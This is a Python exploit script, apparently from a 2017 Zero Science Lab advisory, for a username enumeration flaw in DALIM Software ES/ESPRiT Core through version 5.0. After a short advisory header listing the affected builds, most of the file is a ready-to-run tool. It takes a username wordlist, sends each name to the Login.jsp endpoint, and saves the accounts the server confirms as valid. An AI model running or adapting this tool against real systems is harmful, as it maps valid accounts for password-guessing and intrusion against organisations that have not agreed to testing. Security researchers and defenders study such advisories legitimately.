#!/usr/bin/env python
#
#
# DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness
#
#
# Vendor: Dalim Software GmbH
# Product web page: https://www.dalim.com
# Affected version: ES/ESPRiT 5.0 (build 7184.1)
# (build 7163.2)
# (build 7163.0)
# (build 7135.0)
# (build 7114.1)
# (build 7114.0)
# (build 7093.1)
# (build 7093.0)
# (build 7072.0)
# (build 7051.3)
# (build 7051.1)
# (build 7030.0)
# (build 7009.0)
# (build 6347.0)
# (build 6326.0)
# (build 6305.1)
# (build 6235.9)
# (build 6172.1)
# ES/ESPRiT 4.5 (build 6326.0)
# (build 6144.2)
# (build 5180.2)
# (build 5096.0)
# (build 4314.3)
# (build 4314.0)
# (build 4146.4)
# (build 3308.3)
# ES/ESPRiT 4.0 (build 4202.0)
# (build 4132.1)
# (build 2235.0)
# ES/ESPRiT 3.0
#
# Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
# Core is the engine that can handle project tracking, JDF device workflow,
# dynamic user interface building, volume management. Each ES installation
# will have different features, depending on the license installed: online
# approval, prepress workflow, project tracking, imposition management...
#
# ES is a collaborative digital asset production and management platform,
# offering services ranging from online approval to web-based production
# environment for all participants of the production cycle, including brand
# owners, agencies, publishers, pre-media, printers and multichannel service
# provider. ES lets users plan, execute and control any aspect of media
# production, regardless of the final use of the output (print, web, ebook,
# movie, and others). It ensures productivity and longterm profitability.
#
# Desc: The weakness is caused due to the 'Login.jsp' script enumerating
# the list of valid usernames when some characters are provided via the
# 'login' parameter.
#
# Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
# CentOS 7
# Apache Tomcat/7.0.78
# Apache Tomcat/7.0.67
# Apache Tomcat/7.0.42
# Apache Tomcat/6.0.35
# Apache-Coyote/1.1
# Java/1.7.0_80
# Java/1.6.0_21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5425
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php
#
#
# 15.06.2017
#
import argparse
import requests
import sys
from colorama import Fore, Back, Style, init
init()
print 'User Enumeration Tool v0.3 for DALiM ES <= v5.0'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')
args = parser.parse_args()
if len(sys.argv) != 5:
parser.print_help()
sys.exit()
host = args.target
fn = args.file
try:
users = open(args.file, 'r')
except(IOError):
print '[!] Error opening \'' +fn+ '\' file.'
sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
results = open('validusers.txt', 'w')
for line in lines:
try:
r = requests.post("http://" +host+ "/Esprit/public/Login.jsp", data={'actionRole' : 'getRoles', 'login' : line})
print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
testingus = r.text[50:72]
if testingus[19:20] != "\"":
print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
results.write('%s\n' % line)
except:
print '[!] Error connecting to http://'+host
sys.exit()
results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.\n'